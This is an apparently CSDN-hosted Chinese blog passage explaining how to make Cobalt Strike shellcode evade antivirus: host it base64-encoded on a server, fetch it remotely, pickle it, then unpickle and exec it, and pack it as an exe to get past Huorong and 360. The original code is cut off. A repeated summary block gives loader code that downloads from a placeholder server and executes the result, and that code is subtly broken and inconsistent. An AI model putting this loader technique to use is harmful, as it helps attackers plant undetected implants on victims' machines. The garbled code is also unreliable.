Python远程加载分离、反序列化免杀

01思路

1、CS生成python x64 shellcode ->payload.py
2、将payload.py中shellcode进行base64编码,放至服务器保存为shellcode_bs64.txt,并开启python http服务
3、编写shellcode.py,向服务器发送请求读取payload.txt,进行序列化并base64编码
4、编写exp.py进行反序列化,加载恶意shellcode
5、打包exe,可过火绒、360

02具体操作

CobaltStrike生成payload

图片

base64编码,放至服务器

图片

服务器开启python http服务

图片

shellcode.py远程加载shellcode_bs64.txt,bs64解码后将shellcode填入加载器,将代码中请求地址改为服务器地址+端口+路径;
将带shellcode的加载器序列化再base64编码输出

import pickle
import base64

shellcode = """
import ctypes
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
为了Python反序列化免杀执行代码,可以使用以下步骤: 1. 生成Python x64 shellcode,并将其放入payload.py文件中。 2. 对shellcode进行base64编码,并将其保存在服务器上的shellcode_bs64.txt文件中。 3. 编写shellcode.py文件,向服务器发送请求以读取payload.txt文件,对其进行序列化并进行base64编码。 4. 编写exp.py文件进行反序列化加载恶意shellcode。 5. 打包exe文件,以便绕过火绒、360等杀毒软件的检测。 以下是具体操作步骤: 1. 生成Python x64 shellcode,并将其放入payload.py文件中。 2. 对shellcode进行base64编码,并将其保存在服务器上的shellcode_bs64.txt文件中。 3. 编写shellcode.py文件,向服务器发送请求以读取payload.txt文件,对其进行序列化并进行base64编码。 ```python import requests import base64 url = 'http://yourserver.com/shellcode_bs64.txt' response = requests.get(url) shellcode = response.content # 对shellcode进行反序列化并进行base64编码 serialized = base64.b64encode(pickle.dumps(shellcode)).decode('utf-8') ``` 4. 编写exp.py文件进行反序列化加载恶意shellcode。 ```python import requests import base64 import pickle url = 'http://yourserver.com/shellcode.py' response = requests.get(url) serialized = response.content # 对序列化的数据进行反序列化 data = pickle.loads(base64.b64decode(serialized)) # 加载恶意shellcode exec(data) ``` 5. 打包exe文件,以便绕过火绒、360等杀毒软件的检测。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值